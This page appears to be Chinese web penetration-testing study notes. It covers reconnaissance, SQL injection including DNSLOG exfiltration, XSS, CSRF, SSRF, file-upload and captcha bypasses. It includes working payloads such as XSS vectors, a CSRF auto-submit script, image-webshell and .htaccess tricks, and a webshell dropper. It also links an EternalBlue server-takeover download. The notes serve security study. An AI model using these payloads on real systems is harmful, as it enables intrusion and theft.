<h2 id="3-4-正则表达式"><a href="#3-4-正则表达式" class="headerlink" title="3.4 正则表达式"></a>3.4 正则表达式</h2><h3 id="3-4-1-初始SQL"><a href="#3-4-1-初始SQL" class="headerlink" title="3.4.1 初始SQL"></a>3.4.1 初始SQL</h3><blockquote>
<p>SQL注入原理：<strong>把用户输入的数据当作数据库代码进行执行</strong></p>
</blockquote>
<h3 id="3-4-2-正则表达式（php正则为例）"><a href="#3-4-2-正则表达式（php正则为例）" class="headerlink" title="3.4.2 正则表达式（php正则为例）"></a>3.4.2 正则表达式（php正则为例）</h3><p>（<strong>对数据串的处理的方法</strong>）</p>
<ol>
<li>正则表达式的格式：“/表达式/[修饰符]” <strong>使用规则时一定要加代表正则的标志//</strong></li>
</ol>
<ol start="2">
<li>相关函数</li>
</ol>
<ul>
<li>preg_match_all(正则表达式，匹配字符串)：返回匹配到的次数</li>
<li>preg_repalce(正则表达式,替换内容，匹配字符串):返回替换后的值</li>
</ul>
<ol start="3">
<li><p>正则表达式语法</p>
<ol>
<li>转义字符<blockquote>
<p>数字：\d</p>
</blockquote>
</li>
</ol>
<blockquote>
<p>非数字：\D</p>
</blockquote>
<blockquote>
<p>空白字符（空格、制表符、换页符等）：\s</p>
</blockquote>
<blockquote>
<p>非空白字符：\S</p>
</blockquote>
<blockquote>
<p>单词字符（26个英文字母、数字、下划线）：\w</p>
</blockquote>
<blockquote>
<p>非单词字符：\W</p>
</blockquote>
<ol start="2">
<li>集合</li>
</ol>
<blockquote>
<p>字符集合：[单个字符或字符区间]，用于匹配集合内字符</p>
<blockquote>
<p>[a-z]表示a-z这26个小写字母</p>
<p>[0-9a-z]表示0-9这10个数字和a-z26个小写字母</p>
<p>[135a-h]表示包含数字1，3，5和字母a-h这8个字母</p>
<p>注意：<strong>两个不同字符段间请勿使用,隔开</strong>。</p>
</blockquote>
</blockquote>
<blockquote>
<p>非集:[^单个字符或字符区间]，用于匹配非集合内字符。</p>
<blockquote>
<p>[^0-9]表示匹配所有非数字字符。</p>
<p>[^a-zA-Z]表示匹配所以非字母字符。</p>
</blockquote>
</blockquote>
<ol start="3">
<li>限定符<blockquote>
<p>{n}     =&gt; 例如:  0{8}     意思是指 只有连起来8个0才会被匹配   </p>
</blockquote>
</li>
</ol>
<blockquote>
<p>{n,}    =&gt;例如： 0{2,}    意思是 只要有2个0及其以上的就会被匹配</p>
</blockquote>
<blockquote>
<p>{n,m}   =&gt;  例如： 0{2,4} 意思是最少匹配2个0，最多匹配4个0</p>
</blockquote>
<p>   <strong>注：被匹配时，默认匹配最多的次数</strong></p>
<ol start="4">
<li>修饰符(位于正则标志符后：//修饰符)<blockquote>
<p>/i    =&gt; 不区分大小写</p>
</blockquote>
</li>
</ol>
<blockquote>
<p>/A    =&gt; 匹配规则必须从头开始匹配</p>
</blockquote>
<blockquote>
<p>/s     =&gt; .将匹配一切字符</p>
</blockquote>
<blockquote>
<p>/x     =&gt; 正则表达式中的空白字符会被忽略</p>
</blockquote>
<ol start="5">
<li>特殊字符<blockquote>
<p>()      ： 和数学一样很像，代表这是一个整体。</p>
</blockquote>
</li>
</ol>
<blockquote>
<p>^       ：     匹配输入字符串的开始位置</p>
</blockquote>
<blockquote>
<p>$       ： 匹配输入字符串的结尾位置</p>
</blockquote>
<blockquote>
<p>.       ： 通配符[代表任意字符][不匹配换行]</p>
</blockquote>
<blockquote>
<p>*： 匹配0次或者多次</p>
</blockquote>
<blockquote>
<p>+： 匹配1次或者多次</p>
</blockquote>
<blockquote>
<p>\         ： 转义字符</p>
</blockquote>
<blockquote>
<p>|          ：   两项之间的一个选择。</p>
</blockquote>
<p> **.<em>代表任何字符</em>*</p>
</li>
</ol>
<h1 id="四、信息收集"><a href="#四、信息收集" class="headerlink" title="四、信息收集"></a>四、信息收集</h1><h2 id="4-1-信息收集基础"><a href="#4-1-信息收集基础" class="headerlink" title="4.1 信息收集基础"></a>4.1 信息收集基础</h2><p>  信息收集的目标=&gt;<strong>找到目标薄弱点</strong></p>
<p>  信息收集的方向=&gt;针对不同目标，有不同的收集内容要求。</p>
<p>  常用信息收集的内容：</p>
<h3 id="4-1-1-whois：域名注册的时候所留下的信息"><a href="#4-1-1-whois：域名注册的时候所留下的信息" class="headerlink" title="4.1.1 whois：域名注册的时候所留下的信息"></a>4.1.1 <strong>whois</strong>：域名注册的时候所留下的信息</h3><p>  查询网站推荐：<a target="_blank" rel="noopener" href="https://whois.chinaz.com/">站长工具</a></p>
<p>  通过whois查询可以获得目标网站的管理员的名字、电话号码、邮箱，以及其其它关联域名。</p>
<h3 id="4-1-2查询跟企业有关的内容"><a href="#4-1-2查询跟企业有关的内容" class="headerlink" title="4.1.2查询跟企业有关的内容"></a>4.1.2查询跟<strong>企业</strong>有关的内容</h3><blockquote>
<p>查询网站推荐：</p>
<ol>
<li><p><a target="_blank" rel="noopener" href="https://www.xiaolanben.com/">小蓝本</a>:企业基础信息、公司股东（高权限、不懂电脑=&gt;通过股东名字去爆破密码）、新媒体、APP、网站</p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://www.qcc.com/?utm_source=baidu1&utm_medium=cpc&utm_term=pzsy">企查查</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://www.tianyancha.com/?jsid=SEM-BAIDU-PZ-SY-2021112-BIAOTI">天眼查</a></p>
</li>
</ol>
</blockquote>
<h3 id="4-1-3-子域名收集"><a href="#4-1-3-子域名收集" class="headerlink" title="4.1.3 子域名收集"></a>4.1.3 <strong>子域名收集</strong></h3><blockquote>
<p>通过证书查询 =&gt; 针对HTTPS的网站<br>查询网站推荐：<a target="_blank" rel="noopener" href="https://crt.sh/">crt</a></p>
<p>子域名之间没有关联 =&gt;不同主机、不同ip、不同服务、不同数据</p>
</blockquote>
<h3 id="4-1-4-端口探测"><a href="#4-1-4-端口探测" class="headerlink" title="4.1.4 端口探测"></a>4.1.4 <strong>端口探测</strong></h3><blockquote>
<p>端口会承载一些功能，一些端口容易存在漏洞</p>
<p>使用场景：</p>
<ol>
<li><p>445(永恒之蓝)，3389（爆破、0708）、6379（redis未授权访问）</p>
</li>
<li><p>有些网站，可能没给域名，直接给端口（安全性比较 有域名&gt;无域名  80端口网站（主站）&gt;其它端口网站）</p>
</li>
</ol>
<p>使用工具:(Nmap|搜索引擎)</p>
</blockquote>
<h3 id="4-1-5网络空间搜索引擎（针对于网络设备）"><a href="#4-1-5网络空间搜索引擎（针对于网络设备）" class="headerlink" title="4.1.5网络空间搜索引擎（针对于网络设备）"></a>4.1.5<strong>网络空间搜索引擎</strong>（针对于网络设备）</h3><blockquote>
<p>推荐搜索网站及工具：</p>
<ul>
<li><p>IP、端口检测：<a target="_blank" rel="noopener" href="https://fofa.so/">FOFA</a>、<a target="_blank" rel="noopener" href="https://www.zoomeye.org/">钟馗之眼</a></p>
</li>
<li><p>目录扫描（主动式扫描（存在风险=&gt;可能会使目标死机））：御剑</p>
<p>扫的频率过高会被ban（需要开代理换IP）</p>
</li>
<li><p>指纹识别:看网站是否是某个框架、一些基础组件</p>
<p>  指纹识别平台：<a target="_blank" rel="noopener" href="http://finger.tidesec.net/">潮汐</a>、微步</p>
<p>  cms的检测，通过将模板的路径放到测试站点来判断是否为同一cms</p>
</li>
<li><p>旁站查询（同IP站点）：<a target="_blank" rel="noopener" href="https://whois.chinaz.com/">站长工具</a></p>
<p>同IP站点：</p>
<ol>
<li>同服务器</li>
<li>同内网(内网渗透、防御性较差)</li>
</ol>
</li>
<li><p>c段扫描（xxx.xxx.xxx.0 — xxx.xxx.xxx.255属于同一个c段）：<a target="_blank" rel="noopener" href="https://whois.chinaz.com/">站长工具</a></p>
<p>存在公司同时买下整个c段的情况</p>
</li>
<li><p>内容敏感信息泄露(低危漏洞)</p>
<p>谷歌语法：google hacking</p>
<ul>
<li>filetype:指定文件类型</li>
<li>site：指定域名</li>
<li>inurl：指定URL</li>
<li>ingtitle：指定title</li>
<li>intext：指定内容</li>
</ul>
</li>
</ul>
</blockquote>
<h2 id="4-2-渗透测试工具——信息收集"><a href="#4-2-渗透测试工具——信息收集" class="headerlink" title="4.2 渗透测试工具——信息收集"></a>4.2 渗透测试工具——信息收集</h2><h3 id="4-2-2-端口"><a href="#4-2-2-端口" class="headerlink" title="4.2.2 端口"></a>4.2.2 端口</h3><ul>
<li><p>Nmap [Kali自带]</p>
<ul>
<li><p>腾讯课堂Kali公开课 如何使用Nmap</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://ke.qq.com/course/373928?flowToken=1029667">https://ke.qq.com/course/373928?flowToken=1029667</a></li>
</ul>
</li>
<li><p>基础命令</p>
<ul>
<li><p>-p</p>
<ul>
<li>指定端口扫描</li>
</ul>
</li>
<li><p>-v</p>
<ul>
<li>显示扫描过程</li>
</ul>
</li>
<li><p>-Pn</p>
<ul>
<li>跳过主机发现过程直接端口扫描 [目标禁ping时]</li>
</ul>
</li>
<li><p>-O</p>
<ul>
<li>探测主机操作系统</li>
</ul>
</li>
<li><p>-A</p>
<ul>
<li>全面扫描，包括一切探测</li>
</ul>
</li>
</ul>
</li>
<li><p>端口扫描状态</p>
<ul>
<li>Opend 端口开放</li>
<li>Closed 端口关闭</li>
<li>Filtered 端口被过滤</li>
</ul>
</li>
</ul>
</li>
<li><p>在线工具</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://tool.chinaz.com/port/">https://tool.chinaz.com/port/</a></li>
</ul>
</li>
<li><p>利用永恒之蓝直接拿下服务器</p>
<ul>
<li>链接：<a target="_blank" rel="noopener" href="https://pan.baidu.com/s/1m5F-7vLC3lpVYOcNcIpLwA">https://pan.baidu.com/s/1m5F-7vLC3lpVYOcNcIpLwA</a> </li>
<li>提取码：zkaq </li>
</ul>
</li>
</ul>
<h3 id="4-2-2-目录扫描"><a href="#4-2-2-目录扫描" class="headerlink" title="4.2.2 目录扫描"></a>4.2.2 目录扫描</h3><ul>
<li><p>御剑扫描</p>
<ul>
<li>小技巧： 看看君子协议robots.txt</li>
</ul>
</li>
</ul>
<h1 id="五、SQL注入"><a href="#五、SQL注入" class="headerlink" title="五、SQL注入"></a>五、SQL注入</h1><h2 id="5-1-SQL注入原理分析"><a href="#5-1-SQL注入原理分析" class="headerlink" title="5.1 SQL注入原理分析"></a>5.1 SQL注入原理分析</h2><h2 id="5-1-1-SQL注入原理"><a href="#5-1-1-SQL注入原理" class="headerlink" title="5.1.1 SQL注入原理"></a>5.1.1 SQL注入原理</h2><p><strong>将用户的输入拼接到sql语句中，并且被当作代码执行</strong></p>
<h2 id="5-1-2-SQL基本注入流程-（显错注入）"><a href="#5-1-2-SQL基本注入流程-（显错注入）" class="headerlink" title="5.1.2 SQL基本注入流程 （显错注入）"></a>5.1.2 SQL基本注入流程 （显错注入）</h2><ul>
<li><p>判断是否存在SQL注入=&gt;输入数据是否被当作代码执行（and 或 简单算数（1+1））</p>
</li>
<li><p>判断字段数（order by）</p>
</li>
<li><p>判断显错位（union:要求前后查询字段数相同，可用填充位解决）</p>
<p><strong>要使前段查询不显示来使后查询的显错位出现</strong></p>
</li>
<li><p>判断库名（在显错位放database（）：显示当前数据库名）</p>
</li>
<li><p>判断表名（information_schema():mysql自带库，其下tables表存放总表名）</p>
<p>  查询语句：select table_name from information_schema.tables where table_schema = ‘’</p>
<p>  遇到多个表：limit 0,1 (限制输出，0表示下标，1表示数量)</p>
</li>
<li><p>查询列名（information_schema下的columns表存放总列名）</p>
<p>  查询语句：select column_name from information_shema.columns where table_schema = ‘’ and table_name = ‘’</p>
</li>
<li><p>寻找具体数据</p>
<p>  查询语句：select 所得到的列名 from 表名</p>
</li>
</ul>
<h2 id="5-2-POST注入"><a href="#5-2-POST注入" class="headerlink" title="5.2 POST注入"></a>5.2 POST注入</h2><p>POST =&gt; 传参方式</p>
<p>POST注入 =&gt; POST传参所产生的注入（与GET注入无区别）</p>
<p>GET和POST传参的区别：</p>
<ol>
<li>对数据本身（编码区别-URL编码） GET会、POST不会</li>
</ol>
<p>SQLmap跑POST注入</p>
<ol>
<li>–form SQLmap自动分析注入点</li>
<li>-r 指定数据包<ul>
<li>burp抓包，复制</li>
<li>在sqlmap文件夹下创建.txt，将内容复制在里面</li>
<li>-r .txt 跑包</li>
</ul>
</li>
</ol>
<h2 id="5-3-HEADER注入（报错注入）"><a href="#5-3-HEADER注入（报错注入）" class="headerlink" title="5.3 HEADER注入（报错注入）"></a>5.3 HEADER注入（报错注入）</h2><p><strong>使用前提：需要成功登录</strong></p>
<p>HEAD注入 =&gt; HEAD传参所产生的注入</p>
<p>$_SERVER 获取HEAD传参</p>
<p>head注入：登录成功、执行某个操作成功的那一下记录ip或者UA</p>
<p>判断注入点：观察是否纯在 insert into</p>
<p>通过报错得到所需信息</p>
<p>运用函数：</p>
<blockquote>
<p>updataxml()</p>
<p>语法:updatexml(目标xml文档，xml路径，更新的内容)</p>
<p>updatexml(‘anything’,’/xx/xx’’,’anything’)</p>
</blockquote>
<blockquote>
<p>concat()</p>
<p>语法：concat():字符串拼接，结合updataxml()使用</p>
<p>updatexml(anything,concat(‘~’,(select database())),anything)</p>
</blockquote>
<p><strong>注意：</strong></p>
<p>使用Burp改UA时注意：后要加空格</p>
<h2 id="5-4-盲注"><a href="#5-4-盲注" class="headerlink" title="5.4 盲注"></a>5.4 盲注</h2><ul>
<li><p>使用场景：不存在显错位</p>
</li>
<li><p>分类：</p>
<ul>
<li>布尔盲注：能明确返回TRUE或者FALSE，能通过页面回显判断bool值</li>
<li>时间盲注：只回显一种结果TRUE，不能通过页面回显判断bool值</li>
</ul>
</li>
<li><p>使用函数：</p>
<ul>
<li>length():判断字符串长度</li>
<li>substr(截取对象,截取位置,截取长度):截取字符串（起始位从1开始算起）</li>
<li>ascii（）返回对象ASCII码</li>
<li>sleep() <strong>用于时间盲注</strong></li>
</ul>
</li>
<li><p>注入流程（使用burp）</p>
<ul>
<li>布尔盲注<ol>
<li>判断长度 </li>
<li>substr()判断字符（用ascii码）</li>
<li>其余步骤与基础步骤一样</li>
</ol>
</li>
<li>时间盲注使用if语句+sleep()函数判断bool值if(条件，条件成立执行，条件不成立执行)  </li>
</ul>
</li>
</ul>
<h1 id="六、Access注入"><a href="#六、Access注入" class="headerlink" title="六、Access注入"></a>六、Access注入</h1><h2 id="6-1-cookie注入"><a href="#6-1-cookie注入" class="headerlink" title="6.1 cookie注入"></a>6.1 cookie注入</h2><ul>
<li>原理：$_REQUEST会接收Cookie传参</li>
</ul>
<p><strong>php 5.4以上$_REQUEST不会接收Cookie传参</strong></p>
<ul>
<li><p>运用函数：</p>
<blockquote>
<p>escape():编译字符串（UML编码）</p>
<p>在浏览器之中需要把所需传递信息进行编码后传输</p>
</blockquote>
</li>
<li><p>设置cookie方式：</p>
<p>  注意：Cookie传参值需要URL编码，记得传参的值用URL编码</p>
<ol>
<li><p>通过抓包修改cookie值</p>
</li>
<li><p>用Javascript来设置Cookie</p>
<p> 于控制台输入代码：document.cookie=”传输对象=”+escape(“传输内容”)</p>
</li>
</ol>
</li>
</ul>
<ul>
<li><p>掌握函数：</p>
<ol>
<li>exists():exists 检查是否有数据，如果能会返回一个True</li>
</ol>
</li>
<li><p>针对Access库注入的流程：</p>
<ul>
<li>判断是否存在注入  1=1/1=2</li>
<li>用exists()函数判断出页面所在的表和表中的列：  （用burp爆破）=&gt; select * from xxxx（判断表名）/select xxxx from 目标表（判断列名）</li>
<li>判断显错位（流程一样 order by + select）</li>
<li>得出数据</li>
</ul>
</li>
</ul>
<h2 id="6-2-偏移注入"><a href="#6-2-偏移注入" class="headerlink" title="6.2 偏移注入"></a>6.2 偏移注入</h2><ul>
<li><p>使用前提：要注入表的字段数小于当前页面的字段数</p>
</li>
<li><p>使用语法：库名.表名、表名.字段名</p>
<p>  select admin.* from admin = select username,password from admin =&gt; admin.*==username,password==admin表中的所有字段</p>
</li>
<li><p>注入原理<br>select 1,2,3,4,admin.*,8,9,10  =&gt;select 1,2,3,4,id,username,password,8,9,10 </p>
</li>
</ul>
<p>通过加减位数，来判断其数据的个数，再通过显错位来获取数据</p>
<h1 id="七、DNS-LOG-注入"><a href="#七、DNS-LOG-注入" class="headerlink" title="七、DNS-LOG 注入"></a>七、DNS-LOG 注入</h1><p><strong>(为了解决繁琐的盲注)</strong></p>
<ul>
<li><p>使用函数</p>
<ul>
<li>load_file(‘文件路径’):sql内读取文件的函数</li>
</ul>
<p>  注意路径内（\为转义符，应用\或/代替）</p>
</li>
<li><p>注入对象满足条件：</p>
<ol>
<li>目标有网</li>
<li>Linux不一定能使用 = &gt; Linux默认不自带smb</li>
<li>数据库版本低，或者配置文件被修改</li>
</ol>
</li>
<li><p>注入核心</p>
</li>
</ul>
<p>load_file用UNC路径来发起请求</p>
<p>UNC路径 =&gt; //域名/要访问的文件夹</p>
<ul>
<li>注入方法(默认token:admin)<ol>
<li>生成域名（<a href="dnslog.cn">使用DNSLOG网站</a>）:假设生成域名为:asd.cn</li>
<li>load_file(concat(‘//‘,查询语句,’.asd.cn/xxx’))</li>
</ol>
</li>
</ul>
<h1 id="MSSQL注入-反弹注入"><a href="#MSSQL注入-反弹注入" class="headerlink" title="MSSQL注入 - 反弹注入"></a>MSSQL注入 - 反弹注入</h1><p>MSSQL =&gt;  SQL Server</p>
<p>反弹注入 =&gt; 把查询到的数据插入外部的数据库（公网ip）</p>
<ul>
<li><p>SSQL注入流程</p>
<ol>
<li><p>判断字段数（order by）</p>
</li>
<li><p>判断显错位（select null,null,null）:这里需要严格要求数据类型，故必须先用null占位,再逐位尝试判断其数据类型 =&gt; 数字、字符串</p>
</li>
<li><p>判断表名（不能用database（））</p>
<ul>
<li>法一：select table_name from information_schema.tables）-&gt;得出所有表名</li>
<li>法二：select id,name,null from sysobjects where xtype=’U’</li>
</ul>
</li>
<li><p>判断字段名</p>
</li>
<li><p>获取数据（将目标数据库的信息放到自己建立的数据库里）</p>
</li>
</ol>
</li>
</ul>
<h1 id="八、XSS攻击"><a href="#八、XSS攻击" class="headerlink" title="八、XSS攻击"></a>八、XSS攻击</h1><ul>
<li><p>攻击核心：<strong>窃取目标信息（cookie、内网ip等等），再发送出去</strong></p>
</li>
<li><p>xss类型：</p>
<ul>
<li>反射性：没有保存下来的（一次性）=&gt; 只有自己才能看到</li>
<li>存储型：涉及到存储的（数据库日志）（持久性）=&gt; 别人访问也能执行</li>
<li>Dom型</li>
</ul>
</li>
<li><p>cookie遵循同源法则：同域名|ip、同端口、同协议（同时满足则可共用cookie）</p>
</li>
<li><p>XSS语句：<br>  偷COOKIE =&gt; 触发JS</p>
</li>
<li><p>JS触发方法</p>
<ol>
<li>标签风格：<script>alert(1)</script></li>
<li>伪协议：<a href=Javascript:alert1()></a></li>
<li>事件:满足xxx，触发xxx<img src='https:\\xxxxxx'  onerror=alert(1) /></li>
</ol>
</li>
<li><p>XSS漏洞利用</p>
<ol>
<li><p>得到Cookie =&gt; 读取+发送（ajax 异步传输 需要公网ip）</p>
<p> xss平台：JS代码集成平台（拿cookie 但不安全）（推荐 hk.sb）</p>
</li>
</ol>
</li>
<li><p>XSS防御手段</p>
<ol>
<li>过滤（危险传参）</li>
<li>UML一体化（HTML代码给编码，只有文本意义）</li>
<li>HTTPonly（禁止JS获取Cookie）<ul>
<li>使用ie浏览器绕过</li>
<li>找到探针文件（phpinfo()）</li>
</ul>
</li>
</ol>
</li>
<li><p>DOM型XSS</p>
<ul>
<li>通过DOM可以让脚本动态的访问、控制网页=&gt;通过JS去对网页进行修改、变化、执行  例子：  document.cookie  document.title  document.domain(获取域名)  document.lastModified(返回文档最后被修改的事件 =&gt; 判断网站是否为伪静态（时间改变则为伪静态）)</li>
<li>XSS三种类型<ul>
<li>ducument.write</li>
<li>innerHTML</li>
<li>eval() =&gt; 高危函数，会将字符串当作代码执行</li>
</ul>
</li>
</ul>
</li>
</ul>
<h1 id="九、CSRF漏洞"><a href="#九、CSRF漏洞" class="headerlink" title="九、CSRF漏洞"></a>九、CSRF漏洞</h1><p><strong>通过js来发送请求</strong></p>
<ul>
<li><p>漏洞实现前提：</p>
<ol>
<li>存在CSRF漏洞</li>
<li>需要自己做一个网站来骗取点击</li>
</ol>
</li>
<li><p>漏洞核心机制：信任机制 =&gt; 你主动访问的某个站点，代表你信任该站点</p>
</li>
<li><p>与XSS区分</p>
<p>  XSS：窃取Cookie</p>
<p>  CSRF：利用Cookie[只能借用]</p>
</li>
<li><p>CSRF漏洞常见位置</p>
<ol>
<li>CMS：源码固定，可以构建数据包[管理员后台添加管理员]</li>
<li>用户改用户：所有用户的数据包构成相同</li>
</ol>
<p><strong>没有Token的网站就可能有CSRF</strong></p>
</li>
<li><p>判断是否存在CSRF</p>
<ol>
<li>找一个站，登录a用户，修改自己的用户名，密码</li>
<li>构造CSRF数据包</li>
<li>换浏览器，登录b用户</li>
<li>点击做好的CSRF，只要数据能被修改则存在CSRF漏洞</li>
</ol>
</li>
<li><p>如何生成CSRF包:</p>
<ol>
<li>Burp抓包</li>
<li>右键选择tools</li>
<li>构建CSRF Poc =&gt; action指向目标</li>
<li>修改为自动点击 = &gt;加入以下代码<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">document.getElementById(<span class="string">&#x27;按钮id&#x27;</span>).submit();</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<h1 id="十、SSRF漏洞"><a href="#十、SSRF漏洞" class="headerlink" title="十、SSRF漏洞"></a>十、SSRF漏洞</h1><blockquote>
<p>概念：服务器端请求伪造（SSRF）</p>
</blockquote>
</li>
</ol>
</li>
<li><p>SSRF与CSRF的区别<br>CSRF（跨站/服务端请求伪造） =&gt;浏览器因为JS偷偷发送数据包</p>
</li>
</ul>
<p>SSRF（服务端请求伪造） =&gt; 服务器因为你的传参偷偷发送数据包</p>
<ul>
<li><p>漏洞原理</p>
<p>  通过用户传参，可以使一个服务器去访问另一个服务器（如：百度翻译输入网站uml，百度会去访问该网站，并对其进行翻译，在此之中用户利用百度去访问目标网站）</p>
</li>
<li><p>漏洞核心<br>  绕过目标主机防火墙</p>
</li>
<li><p>漏洞危害</p>
<ol>
<li><p>访问内网（外紧内松）</p>
</li>
<li><p>隐藏攻击者（当作跳板机来躲避追踪）</p>
</li>
<li><p>攻击目标本机（用127.0.0.1去访问，其防火墙等安全措施不会对其进行拦截）</p>
<p> dict:// (获取端口信息)</p>
<p> file:// （读取文件）</p>
</li>
</ol>
</li>
</ul>
<h1 id="十一、文件上传漏洞"><a href="#十一、文件上传漏洞" class="headerlink" title="十一、文件上传漏洞"></a>十一、文件上传漏洞</h1><p>文件上传 =&gt; 功能（上传头像、资料、文件）</p>
<p>任意文件上传 -&gt; 满足 1.能否上传上去（存在上传点） 2.能否解析（上传的文件被当作后端脚本处理） 3.能访问到上传文件（路径 只有在根目录下的文件才能访问到）</p>
<p><strong>有些网站虽然没有上传点，但实际存在上传代码</strong><br>编辑器 =&gt; 没有明确使用的上传点，但有于上传有关的函数</p>
<p>文件上传的默认代码是没有防护的</p>
<ul>
<li><p>如何进行防护</p>
<ol>
<li><p>加检测（后缀检测）</p>
<p> 客户端检测：浏览器（js）== 没有检测</p>
<p> 服务端检测：目标主机（后端代码）</p>
</li>
<li><p>建立名单</p>
<p> 黑名单</p>
<p> 白名单</p>
</li>
</ol>
</li>
<li><p>如何绕过：</p>
<p>前端：直接改包，删除js代码</p>
<p>后端（黑名单）：</p>
<ol>
<li><p>后端检测文件类型 =&gt; burp修改文件后缀</p>
</li>
<li><p>后端添加黑名单 =&gt; 使用同解析后缀名（如php =&gt; php3\php4\php5\phtml）</p>
</li>
<li><p>后端黑名单包括所有同解析后缀名 =&gt; 使用.htaccess文件（分布式配置文件） </p>
<p> AddType application/x-httpd-php .jpg  =&gt; 将.jpg图片当作代码执行</p>
</li>
<li><p>未过滤大小写=&gt;大小写绕过 =&gt; windows文件和文件夹不区分大小写</p>
</li>
<li><p>过滤了大小写 =&gt;文件后缀（空）绕过（只适用于windows） .php != .php空格 windows会自动去后缀末尾的空格 <strong>在burp文件后缀处加空格</strong></p>
</li>
<li><p>点绕过 =&gt;文件后缀（.）绕过（只适用于windows） .php != .php. windows会自动去后缀末尾的. <strong>在burp文件后缀处加.</strong></p>
</li>
<li><p>大小写、去空、去点、去htaccess、去文件流 =&gt; 1.php.空格.(需要得到源码，根据源码来解)</p>
<p> 获取源码的方式：</p>
<ul>
<li>github gite</li>
<li>cms魔改</li>
<li>源码泄露</li>
<li>官方提供</li>
<li>知道公司的开发风格</li>
</ul>
</li>
<li><p>将php替换为空 =&gt; 双写绕过（pphphp -&gt; p -&gt;pp -&gt;pph -&gt;pphp -&gt; p-&gt;php） </p>
</li>
<li><p>windows文件流绕过（NTFS格式）<br> 123.txt::$DATA == 123.txt</p>
<p> 将1.php =&gt; 1.php::$DATA</p>
</li>
<li><p>寄生文件<br>cmd代码： echo xxx 1.txt:a.txt  –&gt; 将xxx写入a.txt再将其放入1.txt</p>
<p>dir /r 可以查看</p>
</li>
</ol>
<p>后端（白名单）：</p>
<ol>
<li><p>00 截断 （对计算机 00 代表结束 =&gt; PHP5.3 及以上版本的move_uploaded_file()可以接受 00 ）</p>
<p> 文件上传的过程：上传文件 -&gt; 缓存目录 -&gt; 移动缓存文件（move_uploaded_file()）</p>
<p> 如何将00写入后缀：使用% =&gt; 00 == %00(%紧对GET传参起作用)<br> 若为POST及其它传参：</p>
<ul>
<li>burp在路径最后随意写入一个字符（如a）</li>
<li>抓包找到该字符，将hex之改为00</li>
</ul>
</li>
<li><p>图片马 =&gt; 将图片与木马相拼接<br> 使用cmd命令：copy 1.jpg/b + 2.php 3.jpg</p>
<p> 图片马只能做到能上传，做不到解析<br> 要解析只能通过<strong>解析漏洞</strong>和<strong>文件包含</strong></p>
</li>
<li><p>如果目标会对图片进行二次渲染（如截屏）导致马没了 =&gt;  用.gif绕过（动图的头部不能修改，因为其包含了动图的运动轨迹）<br> 如何修改：先上传文件，再下载，与原图对比，通过观察得出不变的部分，再在该部分直接手写马</p>
</li>
<li><p>条件竞争</p>
<p>   上传文件的流程：</p>
<ul>
<li>先检测：检测合格，然后上传</li>
<li>先上传：上传后再检测        </li>
</ul>
<p> <strong>检测是需要时间的，若在检测的空档期，你访问到了PHP代码，则你的代码会执行</strong></p>
<p> 特殊马：<br> file_put_contents(“a.php”,”xxx”) 生成a.php再将xxxx写入a.php</p>
 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php file_put_contents(&quot;555.php&quot;,&quot;&lt;?php eval($_REQUEST[8]);?&gt;&quot;)?&gt;</span><br></pre></td></tr></table></figure>
<p> <strong>用burp抓上传包和访问包，再同时疯狂访问，卡时差</strong></p>
<p> 注意：<strong>跑包属于标准的恶意攻击</strong></p>
</li>
</ol>
<ul>
<li><p>解析漏洞</p>
<ol>
<li>与文件上传漏洞的区别</li>
</ol>
<pre><code>解析漏洞：让某文件当作PHP执行
文件上传：通过方法上传
</code></pre>
<ol start="2">
<li>IIS解析漏洞<br> IIS6.0会将.asa/.cer/.cdx当作.asp执行就可以使用asp一句话木马上传（.aspx兼容.asp）</li>
<li>IIS6.0解析漏洞</li>
</ol>
<p>  <strong>IIS5.1和IIS7.5不存在该漏洞</strong></p>
<pre><code>  + 存在截断（会认为&#39;;&#39;为截断） =&gt; 就可以将后缀改为xxx.asp;.jpg(允许文件类型)进行绕过
  + / =&gt; 1.asp/1.txt  1.asp为文件夹，1.txt为该文件夹的文件。访问该文件夹则会将其当作1.asp文件执行。在真实渗透场景中，会与文件建立权限相结合（在后台使用）。
</code></pre>
<ol start="4">
<li>CGI解析漏洞</li>
</ol>
<p>  <strong>该漏洞为PHP特有的漏洞</strong><br>  漏洞使用：任何可执行文件在其后添加/.php则可使其当作php文件执行（如1.txt/.php =&gt; 1.php）</p>
</li>
</ul>
</li>
</ul>
<h1 id="十二、逻辑漏洞"><a href="#十二、逻辑漏洞" class="headerlink" title="十二、逻辑漏洞"></a>十二、逻辑漏洞</h1><p>因为代码逻辑产生了问题所产生的漏洞</p>
<h2 id="验证码绕过"><a href="#验证码绕过" class="headerlink" title="验证码绕过"></a>验证码绕过</h2><p>验证码 =&gt; 为了区分操作者是计算机还是人的公共自动程序</p>
<ul>
<li><p>验证码绕过的类型：</p>
<ol>
<li>识别并执行（代码层面）</li>
<li>逻辑产生的问题（逻辑层面）</li>
</ol>
</li>
<li><p>绕过方法：</p>
<ol>
<li><p>前端验证码=&gt;JS处理</p>
</li>
<li><p>任意验证码（无论输啥都对，属于开发偷懒或遗忘）</p>
</li>
<li><p>验证码可以重复使用=&gt;验证码在一段时间内可以重复使用<a target="_blank" rel="noopener" href="http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2016-0169672">实例</a></p>
</li>
<li><p>验证码空值绕过 =&gt;在抓的包之中，删除验证码的传参，可以验证成功<a target="_blank" rel="noopener" href="http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0155066">实例</a></p>
</li>
<li><p>可以通过爆破账号来防止触发验证码<a target="_blank" rel="noopener" href="http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2016-0194576">实例</a></p>
</li>
<li><p>验证码混淆程度低，可以通过脚本识别<a target="_blank" rel="noopener" href="http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0146767">实例</a></p>
</li>
<li><p>验证码不是图片，而直接写在前端代码里（直接写脚本获取）<a target="_blank" rel="noopener" href="http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-071289">实例</a></p>
</li>
